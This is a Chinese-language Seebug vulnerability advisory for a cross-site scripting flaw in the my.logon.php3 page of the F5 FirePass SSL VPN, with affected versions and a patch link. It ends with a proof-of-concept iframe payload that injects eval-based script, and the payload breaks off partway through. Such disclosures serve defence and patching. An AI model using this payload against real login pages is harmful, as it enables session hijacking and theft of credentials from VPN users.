F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3跨站脚本漏洞

2007-12-04T00:00:00
ID SSV:2537
Type seebug
Reporter Root
Modified 2007-12-04T00:00:00

Description

F5 Networks FirePass 4100 SSL VPN是一款功能强大的SSL VPN解决方案。 SSL VPN解决方案不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 问题是"my.logon.php3"脚本对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数数据,并诱使用户访问,可导致恶意脚本在目标域上下文执行。可导致敏感信息重定向到第三方。

F5 FirePass 4100 5.4.2 F5 FirePass 4100 0 F5 FirePass 6.0.1 F5 FirePass 5.5.2 F5 FirePass 5.4.1 F5 FirePass 6.0 F5 FirePass

可参考如下安全公告获得补丁信息: <a href=https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1 target=_blank>https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1</a>

                                        
                                            
                                                &lt;html&gt;
&lt;iframe&nbsp;src=&quot;https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--&quot;&nbsp;width=&quot;0%&quot;&nbsp;height=&quot;0%&quot;&nbsp;name=&quot;xss=document.body.appendChild